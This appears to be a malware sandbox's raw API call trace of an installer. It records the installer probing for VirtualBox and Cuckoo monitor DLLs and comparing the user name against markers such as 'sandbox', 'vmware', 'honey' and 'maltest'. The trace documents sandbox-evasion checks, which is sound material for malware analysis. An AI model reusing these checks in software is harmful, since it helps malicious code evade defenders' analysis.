returned="" [0157.966] LoadLibraryA (lpLibFileName="VBoxHook.dll") 
returned 0x0 [0157.987] lstrcpynA (in: lpString1=0x314418, lpString2="VBoxHook.dll", iMaxLength=1024 | out: lpString1="VBoxHook.dll") returned="VBoxHook.dll" [0157.988] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.988] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.988] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.988] lstrlenA (lpString="0") returned 1 [0157.988] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.988] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.988] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.988] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.988] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.988] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.988] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.988] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.988] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.989] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.989] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.989] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'cuckoomon.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'cuckoomon.dll') i.R0") returned="kernel32::GetModuleHandle(t 'cuckoomon.dll') i.R0" [0157.989] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.989] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.989] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.989] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") 
returned="Call" [0157.990] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.990] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.990] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.990] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.990] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.990] lstrcpynA (in: lpString1=0x323058, lpString2="cuckoomon.dll", iMaxLength=1024 | out: lpString1="cuckoomon.dll") returned="cuckoomon.dll" [0157.990] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.990] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.990] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.991] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.991] lstrcpynA (in: lpString1=0x3217a0, lpString2="cuckoomon.dll", iMaxLength=1024 | out: lpString1="cuckoomon.dll") returned="cuckoomon.dll" [0157.991] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.991] GetModuleHandleA (lpModuleName="cuckoomon.dll") returned 0x0 [0157.991] lstrcpynA (in: lpString1=0x314418, lpString2="cuckoomon.dll", iMaxLength=1024 | out: lpString1="cuckoomon.dll") returned="cuckoomon.dll" [0157.991] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.991] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.991] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.991] lstrlenA (lpString="0") returned 1 [0157.991] lstrcpynA (in: lpString1=0x40a418, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") 
returned="FALSE" [0157.991] lstrlenA (lpString="FALSE") returned 5 [0157.991] lstrcpynA (in: lpString1=0x432800, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.991] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.992] lstrcpynA (in: lpString1=0x42e3a0, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.992] lstrlenA (lpString="FALSE") returned 5 [0157.992] lstrcpynA (in: lpString1=0x40ac18, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.992] lstrcpynA (in: lpString1=0x40b018, lpString2="TRUE", iMaxLength=1024 | out: lpString1="TRUE") returned="TRUE" [0157.992] lstrcmpiA (lpString1="FALSE", lpString2="TRUE") returned -1 [0157.992] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.992] lstrlenA (lpString="") returned 0 [0157.992] lstrcpynA (in: lpString1=0x31400c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.992] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.992] lstrlenA (lpString="") returned 0 [0157.992] lstrcpynA (in: lpString1=0x31441c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.992] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.992] lstrlenA (lpString="") returned 0 [0157.992] lstrcpynA (in: lpString1=0x31482c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.992] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.993] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.993] lstrcpynA (in: lpString1=0x40ac18, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.993] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.993] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.993] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.993] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.993] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.993] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.993] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.993] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff 
[0157.994] lstrcpynA (in: lpString1=0x3217a4, lpString2="advapi32::GetUserName(t .R0, *i 1024 R1) i.R2", iMaxLength=1024 | out: lpString1="advapi32::GetUserName(t .R0, *i 1024 R1) i.R2") returned="advapi32::GetUserName(t .R0, *i 1024 R1) i.R2" [0157.994] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.994] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.994] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.994] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.994] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.995] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.995] lstrcpyA (in: lpString1=0x321fb8, lpString2="advapi32" | out: lpString1="advapi32") returned="advapi32" [0157.995] lstrcpyA (in: lpString1=0x3223c8, lpString2="advapi32" | out: lpString1="advapi32") returned="advapi32" [0157.995] lstrcpyA (in: lpString1=0x3227c8, lpString2="GetUserName" | out: lpString1="GetUserName") returned="GetUserName" [0157.995] GetModuleHandleA (lpModuleName="advapi32") returned 0x76650000 [0157.995] GetProcAddress (hModule=0x76650000, lpProcName="GetUserName") returned 0x0 [0157.995] lstrlenA (lpString="GetUserName") returned 11 [0157.995] GetProcAddress (hModule=0x76650000, lpProcName="GetUserNameA") returned 0x7667a4b4 [0157.995] lstrcpynA (in: lpString1=0x3217a0, lpString2="", 
iMaxLength=1024 | out: lpString1="") returned="" [0157.996] lstrcpynA (in: lpString1=0x321ba8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.996] lstrcpynA (in: lpString1=0x3217a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.996] GetUserNameA (in: lpBuffer=0x321ba8, pcbBuffer=0x2f17c0 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0x2f17c0) returned 1 [0157.998] wsprintfA (in: param_1=0x3217a0, param_2="%d" | out: param_1="15") returned 2 [0157.998] lstrcpyA (in: lpString1=0x432c00, lpString2="15" | out: lpString1="15") returned="15" [0157.998] lstrcpynA (in: lpString1=0x3217a0, lpString2="aDU0VK IWA5kLS", iMaxLength=1024 | out: lpString1="aDU0VK IWA5kLS") returned="aDU0VK IWA5kLS" [0157.998] lstrcpyA (in: lpString1=0x432800, lpString2="aDU0VK IWA5kLS" | out: lpString1="aDU0VK IWA5kLS") returned="aDU0VK IWA5kLS" [0157.998] wsprintfA (in: param_1=0x3217a0, param_2="%d" | out: param_1="1") returned 1 [0157.998] lstrcpyA (in: lpString1=0x433000, lpString2="1" | out: lpString1="1") returned="1" [0157.998] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.998] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.998] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.998] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.998] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.999] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.999] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.999] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.999] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.999] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.999] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.999] lstrcpynA (in: lpString1=0x3250bc, lpString2="User32::CharLower(t R0 R0) i", iMaxLength=1024 | out: lpString1="User32::CharLower(t R0 R0) i") returned="User32::CharLower(t R0 R0) i" [0157.999] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.000] lstrlenA 
(lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.000] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.000] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.000] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.000] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.000] lstrcpyA (in: lpString1=0x3258d0, lpString2="User32" | out: lpString1="User32") returned="User32" [0158.000] lstrcpyA (in: lpString1=0x3217a8, lpString2="User32" | out: lpString1="User32") returned="User32" [0158.000] lstrcpyA (in: lpString1=0x321ba8, lpString2="CharLower" | out: lpString1="CharLower") returned="CharLower" [0158.000] GetModuleHandleA (lpModuleName="User32") returned 0x76780000 [0158.001] GetProcAddress (hModule=0x76780000, lpProcName="CharLower") returned 0x0 [0158.001] lstrlenA (lpString="CharLower") returned 9 [0158.001] GetProcAddress (hModule=0x76780000, lpProcName="CharLowerA") returned 0x767a3e75 [0158.001] lstrcpynA (in: lpString1=0x322c50, lpString2="aDU0VK IWA5kLS", iMaxLength=1024 | out: lpString1="aDU0VK IWA5kLS") returned="aDU0VK IWA5kLS" [0158.001] lstrcpynA (in: lpString1=0x323058, lpString2="aDU0VK IWA5kLS", iMaxLength=1024 | out: lpString1="aDU0VK IWA5kLS") returned="aDU0VK IWA5kLS" [0158.001] lstrcpynA (in: lpString1=0x322c50, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.001] lstrcpynA (in: lpString1=0x322c50, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.001] lstrcpyA (in: lpString1=0x432800, lpString2="adu0vk iwa5kls" | 
out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.001] wsprintfA (in: param_1=0x322c50, param_2="%d" | out: param_1="3289176") returned 7 [0158.001] lstrcpynA (in: lpString1=0x42e3a0, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.001] lstrlenA (lpString="adu0vk iwa5kls") returned 14 [0158.001] lstrcpynA (in: lpString1=0x40ac18, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.001] lstrcpynA (in: lpString1=0x40b018, lpString2="sandbox", iMaxLength=1024 | out: lpString1="sandbox") returned="sandbox" [0158.001] lstrcmpiA (lpString1="adu0vk iwa5kls", lpString2="sandbox") returned -1 [0158.001] lstrcpynA (in: lpString1=0x42e3a0, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.001] lstrlenA (lpString="adu0vk iwa5kls") returned 14 [0158.002] lstrcpynA (in: lpString1=0x40ac18, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrcpynA (in: lpString1=0x40b018, lpString2="vmware", iMaxLength=1024 | out: lpString1="vmware") returned="vmware" [0158.002] lstrcmpiA (lpString1="adu0vk iwa5kls", lpString2="vmware") returned -1 [0158.002] lstrcpynA (in: lpString1=0x42e3a0, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrlenA (lpString="adu0vk iwa5kls") returned 14 [0158.002] lstrcpynA (in: lpString1=0x40ac18, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrcpynA (in: lpString1=0x40b018, lpString2="honey", iMaxLength=1024 | out: lpString1="honey") returned="honey" [0158.002] lstrcmpiA (lpString1="adu0vk iwa5kls", lpString2="honey") returned -1 [0158.002] lstrcpynA (in: lpString1=0x42e3a0, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") 
returned="adu0vk iwa5kls" [0158.002] lstrlenA (lpString="adu0vk iwa5kls") returned 14 [0158.002] lstrcpynA (in: lpString1=0x40ac18, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrcpynA (in: lpString1=0x40b018, lpString2="nepenthes", iMaxLength=1024 | out: lpString1="nepenthes") returned="nepenthes" [0158.002] lstrcmpiA (lpString1="adu0vk iwa5kls", lpString2="nepenthes") returned -1 [0158.002] lstrcpynA (in: lpString1=0x42e3a0, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrlenA (lpString="adu0vk iwa5kls") returned 14 [0158.002] lstrcpynA (in: lpString1=0x40ac18, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrcpynA (in: lpString1=0x40b018, lpString2="maltest", iMaxLength=1024 | out: lpString1="maltest") returned="maltest" [0158.002] lstrcmpiA (lpString1="adu0vk iwa5kls", lpString2="maltest") returned -1 [0158.002] lstrcpynA (in: lpString1=0x42e3a0, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrlenA (lpString="adu0vk iwa5kls") returned 14 [0158.002] lstrcpynA (in: lpString1=0x40ac18, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrcpynA (in: lpString1=0x40b018, lpString2="malware", iMaxLength=1024 | out: lpString1="malware") returned="malware" [0158.002] lstrcmpiA (lpString1="adu0vk iwa5kls", lpString2="malware") returned -1 [0158.002] lstrcpynA (in: lpString1=0x42e3a0, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrlenA (lpString="adu0vk iwa5kls") returned 14 [0158.002] lstrcpynA (in: lpString1=0x40ac18, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrcpynA (in: 
lpString1=0x40b018, lpString2="currentuser", iMaxLength=1024 | out: lpString1="currentuser") returned="currentuser" [0158.002] lstrcmpiA (lpString1="adu0vk iwa5kls", lpString2="currentuser") returned -1 [0158.002] lstrcpynA (in: lpString1=0x40a418, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0158.002] lstrlenA (lpString="FALSE") returned 5 [0158.002] lstrcpynA (in: lpString1=0x432800, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0158.002] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.003] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.003] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.003] lstrcpynA (in: lpString1=0x42e3a0, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0158.003] lstrlenA (lpString="FALSE") returned 5 [0158.003] lstrcpynA (in: lpString1=0x40ac18, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0158.003] lstrcpynA (in: lpString1=0x40b018, lpString2="TRUE", iMaxLength=1024 | out: lpString1="TRUE") returned="TRUE" [0158.003] lstrcmpiA (lpString1="FALSE", lpString2="TRUE") returned -1 [0158.003] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.003] lstrlenA (lpString="") returned 0 [0158.003] lstrcpynA (in: lpString1=0x31400c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.003] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.003] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.003] lstrcpynA (in: lpString1=0x40ac18, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.003] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.003] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.003] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.003] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.003] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.003] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 